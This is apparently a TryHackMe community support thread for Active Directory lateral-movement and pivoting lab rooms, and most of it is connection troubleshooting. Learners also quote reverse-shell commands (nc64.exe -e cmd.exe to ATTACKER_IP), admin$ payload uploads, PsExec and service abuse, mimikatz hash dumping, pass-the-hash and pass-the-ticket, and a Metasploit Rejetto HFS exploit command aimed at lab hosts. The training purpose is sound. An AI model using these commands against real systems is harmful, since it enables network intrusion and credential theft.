THM exploiting AD
it's v slow
i took a long time to get credentials
does anyone encounter this when trying to rdp? [03:23:27:416] [23768:23769] [WARN][com.freerdp.crypto] - Certificate verification failure 'self-signed certificate (18)' at stack position 0
[03:23:27:416] [23768:23769] [WARN][com.freerdp.crypto] - CN = THMJMP2.za.tryhackme.com
[03:23:30:478] [23768:23769] [ERROR][com.winpr.timezone] - Unable to find a match for unix timezone: Canada/Eastern
[03:23:30:783] [23768:23769] [ERROR][com.freerdp.core.connection] - license connection sequence aborted.
[03:23:30:783] [23768:23769] [ERROR][com.freerdp.core.transport] - transport_check_fds: transport->ReceiveCallback() - -1
[03:23:30:784] [23768:23769] [ERROR][com.freerdp.core] - rdp_client_connect:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[03:23:35:265] [23768:23769] [ERROR][com.winpr.timezone] - Unable to find a match for unix timezone: Canada/Eastern
[03:23:35:669] [23768:23769] [ERROR][com.freerdp.core.connection] - license connection sequence aborted.
[03:23:35:669] [23768:23769] [ERROR][com.freerdp.core.transport] - transport_check_fds: transport->ReceiveCallback() - -1
[03:23:35:669] [23768:23769] [ERROR][com.freerdp.core] - rdp_client_connect:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[03:23:35:669] [23768:23769] [ERROR][com.freerdp.core] - freerdp_post_connect failed
Checking on this. I'll get back to you in a bit.
@shadow linden Good morning, afternoon or evening. I'm facing a rather serious problem with Task #5 - Use of Alternate Authentication Material:
The User "t1_toby.beck" repeatedly refuses to show in the hashes of "thmjmp2.za.tryhackme.com" - what am I missing? Third day in a row - tried at different times... Subnet is 10.200.51.0/xx Thanks
Gave +1 Rep to @shadow linden
Give me some minutes to check on this
Both problems seem to be related. A fix is on the way. I'll keep you posted on it as soon as the fix gets deployed.
Thanks in advance
Followup to this issue: Today I was able to find the hash for t1_leonard.summers - still no t1_toby.beck though - perform the PtH attack and the winrs command - even found the flag.exe files in t1_toby.beck's and t1_leonard.summers' Desktops, but executing both yields - the expected - you're missing something message ...
Did you fix it?
when I using t2 user credential obtained from distributor.za.tryhackme.com/creds_t2. I accept the license with xfreerdp and then, it gives me the following error - 'license connection sequence aborted.' its Lateral Movement and Pivoting task 6. How to fix it?
Hi, I am facing error at task 5
I cannot dump bob.jenkins user's ntlm hash with sekurlsa::msv
only dump t2_user
Good morning - daily update: New subnet 10.200.48.0/24 - same problem as mentioned before - to top it off mimikatz.exe vanished from the C:\Tools directory on thmjmp2
hi, anyone here having issue when connecting to thmjmp2?
I got this
ssh za\\tony.holland@thmjmp2.za.tryhackme.com Connection reset by 10.200.64.249 port 22
Munra said, they're working on it ... but no timeframe for the fix has been announced yet
hi, anyone here having issue with this network?
i'm unable to ping dc ip and other machine ip as well, subnet is 10.200.64.0/24
Hi, do you know this error anyone ?
┌──(root㉿kali)-[/home/pentest/thm/ltmovad]
└─# xfreerdp /v:thmjmp2.za.tryhackme.com /u:t2_kelly.blake /p:8LXuPeNHZFFG
[00:57:30:972] [3305:3306] [WARN][com.freerdp.crypto] - Certificate verification failure 'self-signed certificate (18)' at stack position 0
[00:57:30:972] [3305:3306] [WARN][com.freerdp.crypto] - CN = THMJMP2.za.tryhackme.com
[00:57:37:616] [3305:3306] [ERROR][com.freerdp.core.connection] - license connection sequence aborted.
[00:57:37:616] [3305:3306] [ERROR][com.freerdp.core.transport] - transport_check_fds: transport->ReceiveCallback() - -1
[00:57:37:616] [3305:3306] [ERROR][com.freerdp.core] - rdp_client_connect:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[00:57:49:883] [3305:3306] [ERROR][com.freerdp.core.connection] - license connection sequence aborted.
[00:57:49:883] [3305:3306] [ERROR][com.freerdp.core.transport] - transport_check_fds: transport->ReceiveCallback() - -1
[00:57:49:883] [3305:3306] [ERROR][com.freerdp.core] - rdp_client_connect:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[00:57:49:883] [3305:3306] [ERROR][com.freerdp.core] - freerdp_post_connect failed
Hello everyone
I am having troubles finding any information about t1_toby.beck. I tried every attack with the different scan methods but he won't show up at all.
Any ideas?
there is t1_toby.becker, ntlm hash starting with 533f and ending with 60fe
that's weird... I can't seem to find it
just now I tried in thmjmp2, it is there, using sekurlsa::msv. please try again. drop me a pm if you want the hash directly.
hi @dense badge did you solve it?
Hey everyone, this room is currently undergoing maintenance. Sorry for the issues. The problem has been escalated and a solution is on the way
hi @shadow linden just want to check, did you find any issue with rdp? thanks
Gave +1 Rep to @shadow linden
ok, thanks for your update.
There is a known issue ATM. RDP isn't working indeed
Is there any indication of when the maintenance will be completed?
Sorry for the delay. The network should be up and running now
cc @feral dew @fierce vector @dense badge @frank temple
Thanks @shadow linden - now I was able to complete the final 3 tasks in this room!
Gave +1 Rep to @shadow linden
Hello guys, I am doing from Lateral Movement and Pivoting the Spawning Processes Remotely task, and I can't upload myservice.exe via smb. Can you please help me? Terminal: # smbclient -c 'put myservice.exe' -U t1_rachael.atkinson -W ZA '//thmiis.za.tryhackme.com/admin$/' Zjqf3489
WARNING: The "syslog" option is deprecated
session setup failed: NT_STATUS_LOGON_FAILURE. I tried to edit the file /etc/samba/smb.conf and then restart the service, but it doesn't work - Attempt #1: # sudo service samba restart
Failed to restart samba.service: Unit samba.service not found. Attempt #2: # sudo systemctl restart smbd
Failed to restart smbd.service: Unit smbd.service not found. Attempt #3: # sudo systemctl enable smb.service
Failed to enable unit: Unit file smb.service does not exist. Thanks a lot.
Hi, did you try to replace thmiis.za.tryhackme.com with the IP address?
Hello everybody, I would like to understand task 3: we connect by ssh as the user (in my case the user is tracey.turner) and after that we execute the command runas /netonly /user:ZA.TRYHACKME.COM\t1_leonard.summers "c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 4443" to get a reverse shell, and we are connected with tracey.turner access (because we use the argument netonly). Finally we use the command sc.exe \\thmiis.za.tryhackme.com create THMservice-3249 binPath= "%windir%\myservice.exe" start= auto. Why in the example do we execute the runas command, since at the end we are already connected with tracey.turner access? Thanks a lot
Finally I understood: we need to execute the runas /netonly command because afterwards we are connected with the TOKEN of **t1_leonard.summers** and the next commands with sc will be executed with the t1_leonard.summers permissions.
@last geyser Yes, same result: # smbclient -c 'put myservice.exe' -U t1_george.kay -W ZA '//10.200.64.201/admin$/' Jght9206
WARNING: The "syslog" option is deprecated
Connection to 10.200.64.201 failed (Error NT_STATUS_IO_TIMEOUT)
Hey there, are you using your own machine or the attackbox?
Ah I see the problem. For task 3 you are supposed to use t1_leonard.summers account
the one you are trying to use doesn't exist
@shadow linden Attackbox. Oh, I thought I was supposed to use the credentials assigned to me in Task 1 from http://distributor.za.tryhackme.com/creds. But still: # smbclient -c 'put sss.exe' -U t1_leonard.summers -W ZA.TRYHACKME.COM '//thmiis.za.tryhackme.com/admin$/' EZpass4ever
WARNING: The "syslog" option is deprecated
session setup failed: NT_STATUS_CONNECTION_RESET
@shadow linden I finally solved - when it wasn't working I watched the youtube walkthrough and guy was replacing -W ZA with -W ZA.TRYHACKME.COM. Then I revert changes and add only leonard.summers credentials and it work. So thanks man! Term: # smbclient -c 'put myservice.exe' -U t1_leonard.summers -W ZA '//thmiis.za.tryhackme.com/admin$/' EZpass4ever
WARNING: The "syslog" option is deprecated
putting file myservice.exe as \myservice.exe (316.3 kb/s) (average 316.3 kb/s)
Gave +1 Rep to @shadow linden
Glad it works! 🥳
Can someone reset this room, cant connect to it at all :/
If anyone happens to be in the 10.200.75.x subnet, could you vote for a reset? Task 7 seems to not be creating sessions at the moment when exploiting rejetto.
I'm stuck on task 7... I'm not getting sessions from Rejetto, anyone able to help? it seems 7777 was in use, so I switched to 7575 and i'm just getting Exploit completed, but no session was created.
hello
Hi there.
I'm doing the Task 4 "Moving Laterally Using WMI",
everything is just fine until the flag.exe.
I've seen people also struggling in this server, but no concrete answer,
any ideas ?
Ah seems like I have found an answer
I will try again later and confirm here afterwards
Did you find any answer? I'm stuck here too. Thanks.
Gave +1 Rep to @lilac kite
Hey there, sorry for the late response. I tried replicating the error, but it all works as expected for me. If you are using the attackbox, be sure not to use port 7777 as it seems to be in use already by some other process
Zwiad - Today at 18:24
Heya
I'm doing the Lateral Movement Network. Got into the IIS machine but when the Flag.exe is run, it displays: Sorry! You're still missing something, no flag for you yet (7)
my guess is that I didn't auth properly against the DC with /netonly
because that's the only thing I could've f'ed up without knowing about it. Having said this, I have no idea how to do that properly and yes I did complete the adenum network before this one
Could sb give me a nudge or something pretty please?
Also, say in case that nc64.exe wasn't available , can we just upload the bin ourselves? Like precompiled socat one for example? Having nc installed like that seems all too convenient
Zwiad - Today at 18:36
Oh and I decided to use a cmd reverse shell instead of meterpreter. I don't like relying on metasploit :D
In the meantime I will just download the .exe and dig around, maybe I will find a flag in it like this LMFAO
Okay nevermind, I forgot how to transfer files over from that to my VMbox machine. Gonna wait for sb to tell me what I'm doing wrong. :D
Hey there, which task/flag is this?
Task 3
so? no dice ?
oh you're one of the creators lol. Cool
Hey there, sorry for the late response. I was a bit disconnected throughout the weekend. The error you are getting is related to your shell process being spawned in a different way than expected. Are you following the guide as-is, or doing some variations to it?
Oh and I decided to use a cmd reverse shell instead of meterpreter. I don't like relying on metasploit :D
This maybe?
aside from that not really
and yes I m using the exe-service format
But aside from that I use sc.exe as shown no other variations lol
Ah I see. The flag checker is actually looking for some evidence that you completed the task. As you may guess, building a "generic" checker that accounts for all possible variations is quite hard, so in this case the check that is failing is actually the last one, and might be bound to the way meterpreter starts. I'd suggest you use the proposed method in this case for the moment.
hi
the room beginning requires connecting to the lateral movement ovpn
but when i check my access
i didn't see it
@shadow linden
Hey there, be sure to join the room before trying to download your ovpn profile
if that doesn't work, let me know
I already joined
But when I go to my access page I can't find the ovpn configuration file
Would you mind sending a screenshot so I can check? I'll send you an invite in case you prefer to DM it
Alright let me send the screenshot
can someone please hit the reset if ur on 10.200.19.*
Guys, I'm unable to access the network
Not via local machine and not via Attack Box too
I never follow the full instructions they set in the first task. On my local machine, all I do is open up /etc/resolv.conf and comment out my VMWare's nameserver IP and add an additional nameserver for the IP of the DC for the room. Works perfectly. If I need internet access outside of their network, that's what my Host is for. Easy copy/paste. And if I need to update a tool/download a new tool, I just disconnect from the VPN quick, change which nameserver is commented out, and then download/update the tool. Then revert back to how it was before and reconnect the vpn.
EDIT: fixed a typo for resolve.conf to be corrected to the actual name /etc/resolv.conf
Hey there, sorry for the late response. You need to replace $THMDCIP with the IP of your assigned THMDC.
Aha okay!
Did that, still :(((
Even this didn't work for me 😦
why lateral.ovpn can't connect?
It can, but via that also I am unable to access distributor.za.tryhackme.com
Be sure to put the IP of THMDC as stated on your room's diagram
it should look like 10.200.x.101
Is lateralmovementandpivoting.ovpn ok? i can't connect to it, but i can connect to other ovpn files like ADenumerate.ovpn.
@shadow linden
If the connection keeps on resetting, try regenerating your ovpn file in the website and that should do the trick
That may also be the case. If you want to, feel free to DM me and we can run a couple of checks
Oh okay
Did that, still inaccessible @shadow linden
Restarted network manager too
Can you send me the output of the following command: nslookup thmdc.za.tryhackme.com 10.200.48.101
Here you go
What is the output of your /etc/resolv.conf file? Blur out or take out/delete out your VM's nameserver IP when you post it so you don't expose that (just to be safe).
Your resolv.conf file should look like this:
Generated by NetworkManager
search localdomain
nameserver [your local nameserver IP here - mine is given to me by VMWare]
You need to modify it to be like this:
Generated by NetworkManager
search localdomain
#nameserver [your local nameserver IP here - mine is given to me by VMWare]
nameserver 10.200.*.101 (fill in the dot with whatever your room says the DC is)
Doing this doesn't work for you? Is your VM set to NAT? You're correctly connected via the lateralmovement.ovpn file that you generated? And sorry, I edited my comment here. I misspelled the resolv file as resolve.conf. It's just resolv.conf. If you did it exactly how I mentioned before, you probably just created a new file at /etc/resolve.conf, which doesn't work for anything. Sorry about that. My bad! Stupid typos get you every time. The proper spelling of the file is resolv.conf.
EDIT: and hey, maybe the better option is to just absolutely leave the room and load up into a different 10.200.*.101 environment. I just had a similar issue with exploitingad. Only thing that worked for me to resolve it was to leave the room and join a new *.101 (moving from .60.101 to .79.101). Now it's working just like normal.
In this case, the server is down. Be sure to check if the network has been started from the website. If it shows as "running", then the network might need a reset.
oh and there seems to be a typo in your IP
in the command it reads 10.200.28.101 instead of 10.200.48.101 which is what you had in some images before this one
Argh shoottt. Now nslookup works as expected but still I am not able to navigate to http://distributor.za.tryhackme.com/creds.
if nslookup works, then the DNS server is up and running. I'd go with what dekker proposed and just edit /etc/resolv.conf to point to THMDC's IP address. If your browser still doesn't load the website, it may be related to cache preventing you from doing so. Instead of using your browser, do a curl http://distributor.za.tryhackme.com/creds and that should output some HTML if your DNS is correctly set up. If that works, just close and reopen your browser to avoid any caching and it should work at last
It's a browser cache problem because curl is also not able to resolve the host. /etc/resolv.conf does point to THMDC's IP address too.
Here you go
I also reset the network, yet unable to reach the abovementioned link
i can connect to the ovpn but having trouble setting up the DNS part (after connecting) with /etc/resolv.conf
Yeah I mean, I don't know what do at this point. Completely hopeless @dense saffron
wanna vc?
In your case, the DNS is actually set up. if you pop up a browser it should work.
it may not be clear since nslookup tells you that resolution is failing, but this is a behaviour specific to nslookup in the current network setup. Your navigator should work without a problem
In your case, give me a sec and I'll try to replicate what you are seeing
Here's what I get with the exact same steps
I can't really say what may be happening for you, but I'll send you an invite so you can DM me and we can do some further checking if you want
Now that I re-read your resolv.conf, if you have an additional nameserver before THMDC (which I believe you have in the blurred part of your image), that one takes priority and most programs like curl will fail. Be sure that the first DNS server in your resolv.conf is THMDC, or else it won't work
Here's what I get if I switch the order of the DNS server in my resolv.conf:
looks like that may be it
nvm...sometimes im too autistic for my own good lol
I mean the first two are my VM's nameserver IPs
Ie, created by NetworkManager
You have to comment those out. Put a # before them.
HELLO
Room: https://tryhackme.com/room/lateralmovementandpivoting
Task: 3
I am unable to use smbclient and upload payload to admin$ in thmiis machine
Please help
I'm guessing it's the password at the end?
Don't provide the password as an argument when calling the command. You should be prompted for the password when signing in
can we reset the network in the subnet 10.200.51.X? seems there is a problem with DNS there
i cant connect neither on the attack box nor on my VM
Hey, the account you are using is an unprivileged one, and therefore has no access to admin$ on THMIIS. Be sure to use t1_leonard.summers and it should work.
Oh okay
guys anyone free to talk about Task 3 Spawning Processes Remotely
just a couple of questions
why are we using a netcat? I mean it's very unlikely to find and know the location of nc on windows. If it's just for the task why not make us upload it by ourselves using smb and call it using the smb path in runas, that would've made much more sense right?
why are we using THMJMP2 to use runas? can't we just do that by SSHing into t1_leonard.summers@THMIIS? well of course it might be to prove the point that we can't have ssh all the time but it is a possibility right?
of course you actually don't need to use runas at all if you can ssh into the leonard.summers account but here you can't access the flag if you don't do the pivoting
also why are we using services to spawn a shell? just to get an nt authority shell?
I'm curious about answers to that last question, too. I assumed the variety of approaches demonstrated in these rooms was more for exposure than anything else, to get noobs (of which I am one) recognizing and thinking about the myriad ways to compromise.
That's a lot of questions. So here it goes:
- why are we using a netcat?
  nc is present on the machines to avoid you from having to upload it many times, as we need it in several points of the room. The idea is, indeed, that you can somehow upload it there (using smbclient, ssh or any other method available)
- why are we using THMJMP2 to use runas?
  Since this is a red teaming scenario, the idea is that you somehow got access to a single host (it could be by a phishing campaign or some other method), and you have to run any commands from there usually. While there's no real restriction on using SSH to log into other machines and running commands directly, the assumption is that any logins are being logged and reviewed by the blue team (the enemy). This is why it is important to have several ways of running commands remotely, as some methods might be less obvious for an untrained blue team.
- why are we using services to spawn a shell?
  Again, to try and avoid being detected by using non-conventional methods of doing stuff
Hopefully that helps
Now keep in mind that you are not guaranteed to avoid detection by using these methods. All of them should be well known by any decent blue team. However, having as many methods in your arsenal as possible will help you when tackling different scenarios. There will be networks hardened to avoid such things as services sending remote commands, and there will be networks where the blue team might just disregard a service doing funny things
c.c. @fiery tundra @sullen raptor
this is awesome info thank you @shadow linden !
Gave +1 Rep to @shadow linden
thank you for answering every question.
Gave +1 Rep to @shadow linden
Hey all, I'm on Task 5 and have used PTH and PTK to get a cmd running with the injected ticket of t1_toby_beck. However, I am struggling to get the winrs command to work, it says "the username or password is incorrect".
Does this mean that my original hashes are incorrect?
It's hard to say from the image. If other tools worked, this one should too, but it depends on the PtH or PtK to be done properly. I'd probably start from scratch and see if it works that second time.
For Task 3, when executing Netcat using the supplied "runas" command, upon receiving a shell when I type in "whoami", it still reads back NOT as leonard.summers, but as the user I was executing the runas command with. Is this the intended result? I ask the question because "Flag.exe" displays an error message
it makes me think that despite running the netcat command as "leonard.summers" using the supplied command, it in fact did not run the command as Leonard
Can someone please reset the password for t1_leonard.summers back to EZpass4ever
Task 7 Port Forwarding
is it possible to do Rejetto HFS task with socat? @shadow linden
if yes I tried this on THMJMP2
socat TCP4-LISTEN:8080,fork TCP4:THMDC.za.tryhackme.com:80
socat TCP4-LISTEN:4444,fork TCP4:My_lateral_IP:4444
socat TCP4-LISTEN:5555,fork TCP4:My_lateral_IP:5555
and did as mentioned in the picture on my attack machine. I have no idea why it didnt work first time and worked on second time. after that i tried again a couple of times its just keep failing.
am i doing it right?
I was trying to change the srvhost bit accidentally changed LHOST ofcourse it went to default. The main difference is the URL
What you are doing with socat seems right. I think the second time it worked because of the mistaken IP, actually. By putting THMJMP2's IP as LHOST, the payload on your exploit connected back to THMJMP2. If you set your own IP, without setting ReverseListenerBindAddress to the right address, your payload will try to connect to you directly, which is forbidden by firewall
The reason it doesn't work on further attempts is probably related to ReverseListenerBindAddress not being correctly set
If I remember well, you will still get your original user from whoami instead of t1_leonard_summers. The reason for this is that the credentials are loaded in memory, but not checked against the AD, so the account might not even exist. When you do sc.exe from that console, if your credentials are wrong, then you will get an error. If no error is shown, your credentials should be right. Can you copy/paste the error you are getting from flag.exe? there should be a number at the end of the error msg.
the number was "7"
It said something was still missing and had the number 7 at the end of the message
are you using the same payload as in the example? windows/shell/reverse_tcp
if you use another, the flag checker might get confused
yes, I tried that as well as a few other ones to see if that was the issue. All of them were executed from the AttackerBox which uses MSF5
that's weird... Let me try to replicate it
It works for me
be sure to run flag.exe from the reverse shell you get on the metasploit handler
not the nc one
and just to confirm, this is the result of whoami in the runas console:
so it doesn't show you leonard summers
oh, and if you run whoami on the reverse shell that the service spawned, you should get SYSTEM
thank you for taking the time to perform a detailed verification. I will go back through and see if I am successful.
Gave +1 Rep to @shadow linden
Hello,
I'm stuck on task3, whenever I try to nc from THMJMP2 to my attack machine the spawned cmd is using the wrong account (the one generated by Credential Provider web page instead of t1_leonard.summers)
I can proceed to create the service and start it but the rev shell will say that the session is not valid.
Is there something that I'm missing?
When I try to run runas /netonly /user:ZA.TRYHACKME.COM\t1_leonard.summers "c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 4443" it's going to run it as the unprivileged user
nvm saw that someone had the same issue, Ill try to check the generated payload to see if it's the same thing
Task 7 - Rejetto flag.... having an issue. I can see the app on thmdc... but getting "Exploit Completed, but no session was created."
Well I'm an idiot... I was creating my ssh tunnels from thmiis, not thmjmp2
Can confirm that in Task 3, if a meterpreter payload is used (accidentally, cough), flag.exe does not produce the flag. That's pretty neat. I wonder how 'it' knows.
Which machine? DNS is not working for me - from my own Kali VM. I can reverse DNS but FQDN lookups result in 'Got recursion not available from 10.200.19.101, trying next server'
I've had to do IP address only stuff at the moment. DNS resolves properly from thmjmp2 however.
I can't even ping any of the machines
I think that's not the same subnet of the network I have
I'll just do another room and see if it is fixed in a few hours
ok - yeah I'm on 10.200.19.x
TiL - after today's reset, executing psexec64.exe as Leonard Summers from an SSH prompt 'hangs'. The initial EULA popup was the culprit. I will now include -accepteula as a command line parameter no matter what.
Happening to me this morning. Network is "Running" but I cannot ping the THMDC. This happened to me in Enumerating-AD. It eventually corrected itself in that situation. I expect its something with the AWS infrastructure.
Restarted attackbox and I can now Ping.
Experienced the same issue this morning. I still have some strange network behavior on this box, OpenVPN gets disconnected very often (works just fine on other boxes), Also the accesses to thmjmp2 are not working as expected (from the attackbox) after having obtained credentials, getting connection-reset issues
ssh za\\grace.brooks@thmjmp2.za.tryhackme.com
Connection reset by 10.200.51.249 port 22
Why do we get a shell as nt authority\system after Invoking the .msi installer if we are executing it as t1_corine.waters administrator? Shouldn't we get a shell as t1_corine.waters
I wondered that myself. Noticed it when I installed the payload for the 'service' task as well
rules for how msi installers get installed and stuff... it has some registry keys and properties that can make it run the installer as a high privilege user which does not drop when you get a shell from one
By default, any service you create will run as SYSTEM, unless you specify otherwise. You can take a look at the obj parameter of sc.exe create in case you want to force a service to run as any other account: https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/sc-create
notice that you won't be able to use an arbitrary account to run a service. It needs to have the Logon as a Service privilege assigned beforehand. You can check how to add that privilege via security policies here : https://winshuttle-help.s3.amazonaws.com/foundation/en/assigning-user-account-login-as-service.htm
Cheers! Great information Munra and Shadow. Creating a service for a quick "net user xxx yyy /add" was a cool leveraged use of these permissions.
I think that's the AlwaysInstallElevated privilege
yuup that is the one... did not recall its name
I'll have to do it again to check if it has the registry keys set
But in that task we are installing an msi package, not creating a service
Sorry, I was answering what Sir No1 mentioned. This machine shouldn't have the AlwaysInstallElevated enabled
What that registry entry does is allow a non-admin user to install packages as SYSTEM. In your case, you are already an admin (t1_corine.waters), so you can always install a package with SYSTEM privileges.
That makes sense, so if we are Administrator on a machine we can move to System?
yes, in many ways
I didn't know that, thanks!
Gave +1 Rep to @shadow linden
you can abuse services, msi, task scheduling and some other methods
I just completed the room, the last pivoting challenge was hard to grasp
I think I understand it but I'll probably need to make a diagram to have a clear picture
In Task 3, how to do it with PsExec? I tried with
CKME.COM\t1_leonard.summers -p "EZpass4ever" -i cmd.exe
and i get:
Couldn't access thmiis.za.tryhackme.com:
The specified network name is no longer available.
And when i use the ip instead, i get access denied.
Is the network running? Has your VPN connection timed out? Or someone changed the password on you.
That's strange, because in the task we're uploading to the admin$ with smbclient
You could try to spawn a shell as t1_leonard.summers and execute the psexec command in that cmd
runas /netonly /user:ZA.TRYHACKME.COM\t1_leonard.summers "c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 4443"
I'll try that, thanks
Gave +1 Rep to @delicate reef
I tried both now and both don't work.
za\henry.bird@THMJMP2 c:\tools>PsExec64.exe \\thmiis.za.tryhackme.com -u ZA.TRYHACKME.COM\t1_leonard.summers -p "EZpass4ever" -i cmd.exe
PsExec v2.34 - Execute processes remotely
Copyright (C) 2001-2021 Mark Russinovich
Sysinternals - www.sysinternals.com
Could not start PSEXESVC service on thmiis.za.tryhackme.com:
Access is denied.
and from that nc shell i get:
Microsoft Windows [Version 10.0.17763.1098]
Connecting to thmiis.za.tryhackme.com
Starting cmd.exe on thmiis.za.tryhackme.com...
cmd.exe exited on thmiis.za.tryhackme.com with error code 0.
This is a bit tricky, given the setup here. What you got from the nc shell from the runas command is actually executing cmd.exe via psexec64, but not returning any control of the console on thmiis to you. Instead, the process just closes immediately.
If you want to get a usable shell from there, you could try PsExec64.exe \\thmiis.za.tryhackme.com -u ZA.TRYHACKME.COM\t1_leonard.summers -p "EZpass4ever" -i "C:\tools\nc64.exe -e cmd.exe ATTACKER_IP 1234" and receive the shell using a new nc listener on port 1234
In case you are wondering why you can't just run psexec from your ssh console and have to do that extra step pointed by David, it seems psexec will try to run the service it installs on the remote host with your current session's credentials instead of the ones provided with -u/-p
I got the shell with runas like David said. But it is still not working
You're listening on 4443 but your nc command line is attempting to connect to 1234
i had another tab open with nc -lvp 1234 that didn't get the connection
This "Connection reset by 10.200.51.249 port 22" problem when trying to SSH to thmjmp2 seems to be an on-going problem.
Pretty annoying to waste a bunch of time troubleshooting this...
Has anyone found a workaround?
Hey there, your best bet is to try and reset the network. It should work straight away after it
How did you solve it @minor helm ?
I have the same problem. I try using winrm and i get connected to thmiis.za.tryhackme.com as t1_leonard.summers but it won't show me
what task are you in tho
It's Task 3
Ohh I see..I'm done on task 5 now
Have you tried other methods
I'll get back to you tomorrow since it is currently midnight now and I'm gonna get some sleep.
What I suggest is redoing some of the methods taught tho
Yes, i am already done with the room. Just want to try out the other methods but so far nothing works ^^
got the same prob on task 5 earlier with that
I just tried others and voila got the flag
dont know why it is showing that message
Me neither. Would love to find out though.
Yep..That seems a little bit unknown to me lol
Hey, the reason it isn't working is because you need to use the same method presented in the room to get the flag. You are free to test other methods, but that flag will only work if you get your shell from a service.
Trying to replicate Task3 > PsExec in this room, but when I run PsExec the command seems to hang and does not complete.
CMD: psexec64.exe \\MACHINE_IP -u Administrator -p Mypass123 -i cmd.exe
Also, it is unclear to me which remote MACHINE_IP I should be running the PsExec command against.
I have tried all the IP Address in the LAN (10.200.51.101, 249, and 201) and the command just hangs.
Any help would be greatly appreciated.
Hey, for every task you are presented with the methods and example commands at the start. Each task has a "Let's get to work" section where you are given the credentials and targets you can point to
while the "let's get to work" sections only showcase a single method, you can use the same credentials and targets to practice the rest of the methods if you want. Most if not all methods presented should be possible to use in the network.
so for task 3 you should be able to use t1_leonard.summers and the provided password against thmiis
Hello, in the lateral movement and pivoting room the thmiis machine does not work.
I did not have a question, you have a technical error, because the machine is not even pinged. Could you tell that to the administration?
The error is that the machine does not work...
Not even a ping.
ok
Neither from the attackbox machine nor through a vpn connection.
are you using a vm or the attack box( mainly)
in order to connect to the network you need to download its specific vpn from the access page
I use both
I know, I downloaded the connection, the domain controller and other machines work
I know
I did.
Can you
cat /etc/resolv.conf ?
Is it your host?
But the thmiis machine is not even pinged from the attackbox machine
Maybe they use their windows host
they?
Man, I have already connected by all possible methods, but the ping to the machine still does not go.
Yes, they...
Please try it yourself. Connect to vpn and try to ping thmiis machine
I can't even see the room, I'm not a sub.
yes
What subnet are you on?
It's the third octet on the THMDC.
My guess is either the network is on, or the nameserver is wrong
10.200.71.201
i wonder how it is that the ssh connection on jmp2 succeeded but thmiis doesn't
i mean
if one machine is working then all of them should
And it doesn't work, it's not even pinged.
I'm connected to vpn, all machines except 1 work, it's not me who has the error.
71 subnet
screenshot
I am trying to do Task5 using the Pass-the-Ticket (PTT) method.
- But, when I run sekurlsa::tickets /export from Mimikatz on JMP2, I do NOT get any tickets for t1_toby.beck (without any numbers at the end), only two for t1_toby.beck4 and t1_toby.beck5
- I tried PTT with t1_toby.beck4 and got to THMIIS but am NOT able to run the flag.exe
- Watched @dull crystal's video (thank you!) and saw he does get a ticket for t1_toby.beck (without any numbers at the end).
- Am I missing something for the PTT method?
Yooo thanks for the shout out! It was quite awhile when I did that network so do not remember all the details. @rose kernel might be able to provide some insight though, as he created those networks!
Gave +1 Rep to @reef plaza
Guys I am on task3 but THMIIS seems not working when I try to ping it from JMP host and also using Psexec
Hi all,
is any one managed to go through the last task namely Task 7 Port Forwarding
the exploit doesn't work though ssh forwarding seems to be good and working
I'm stuck on this last task
here what i got :
msf6 exploit(windows/http/rejetto_hfs_exec) > run
[*] Started reverse TCP handler on 127.0.0.1:7878
[*] Using URL: http://THMJMP2.za.tryhackme.com:7676/xuLbqQSh69Y
[*] Server started.
[*] Sending a malicious request to /
[*] Server stopped.
[!] This exploit may require manual cleanup of '%TEMP%\IQyXlaLtsjH.vbs' on the target
[*] Exploit completed, but no session was created.
the cmd used on pivot machine to make local & remote port forwarding :
ssh MyUser@myIP -R 80:THMIIS.za.tryhackme.com:80 -L *:7676:127.0.0.1:7676 -L *:7878:127.0.0.1:7878 -N
the exploit run with metasploit :
sudo msfconsole -x "use exploit/windows/http/rejetto_hfs_exec ; set PAYLOAD windows/shell_reverse_tcp ; set LHOST THMJMP2.za.tryhackme.com ; set ReverseListenerBindAddress 127.0.0.1 ; set LPORT 7878 ; set srvhost 127.0.0.1 ; set srvport 7676 ; set RHOST 127.0.0.1 ; set RPORT 80 ; run"
i perform all those cmd on AttackBox as well as on my own machine, same outcome !
Please help
I think your SSH tunnel is pointing to THMIIS instead of THMDC
rejetto is on THMDC
Hi munra, you're absolutely right! I'll redo it again and see if it works!
thanks
Gave +1 Rep to @shadow linden
@shadow linden I am trying to reach THMIIS from JMPHOST but it doesn't work
I think its bugged or something
I am in task 3
I tried to use meterpreter service reverse shell and psexec but not working, cannot reach it
@rose kernel
Guys, do you know why i get this error with xfreerdp?
connected to THMJMP2.za.tryhackme.com:4578
SSL_read: I/O error: Success (0)
Let me do a quick check
RDP is working for me. I'm not sure about your error message, but it would seem you are trying to connect to port 4578? If you send a screenshot with the entire output, I might be able to give a better answer
ping is disabled in THMIIS, so that may be your problem. It won't work by design. If you want to check if THMIIS is up and reachable, just try doing a ping from THMJMP2 and then immediately run arp -a. If you see a physical address associated to THMIIS's IP, then it is up and reachable.
for the specifics of your problem with psexec, I need more info on what may be failing
if you want to send screenshots, you can do so after verifying your account btw
!docs verify
Yes, I just tried to connect a forwarded port :
root@test~# xfreerdp /v:THMJMP2.za.tryhackme.com:4549 /u:danny.goddard /p:imple56
connected to THMJMP2.za.tryhackme.com:4549
SSL_read: I/O error: Success (0)
I can't put a screenshot here
I forwarded the port with socat :
za\danny.goddard@THMJMP2 C:\Users\danny.goddard>socat.exe TCP4-LISTEN:4549,fork TCP4:THMIIS.za.tryhackme.com:3389
it's really weird
idk why
i would like to ask ChatGPT but it is down
!docs verify
I tried to access $ADMIN share using smbclient and did the same as the walkthrough in task3 but didn't work
Which task is this?
Task 7 and the first flag
can you paste your socat command and rdp screenshot here
oh wait, you already did
why are you using THMJMP2 Creds in rdp command? arent you suppose to use a T1 user credentials?
Forgive me if I'm wrong Its been a long time since I did this room
Did you try with SC?
Thank you for your help. I don't why i did not use T1 creds.. but the error could have been more explicit
Gave +1 Rep to @fiery tundra
Is the network working? I can not ping or reach the DC in any way (set as DNS)... network is running, attackbox or own kali + vpn same result.
Edit: network reset fixed it
can anyone connect to the DC?
i cannot even ping it and i cant restart cuz it needs 3/5
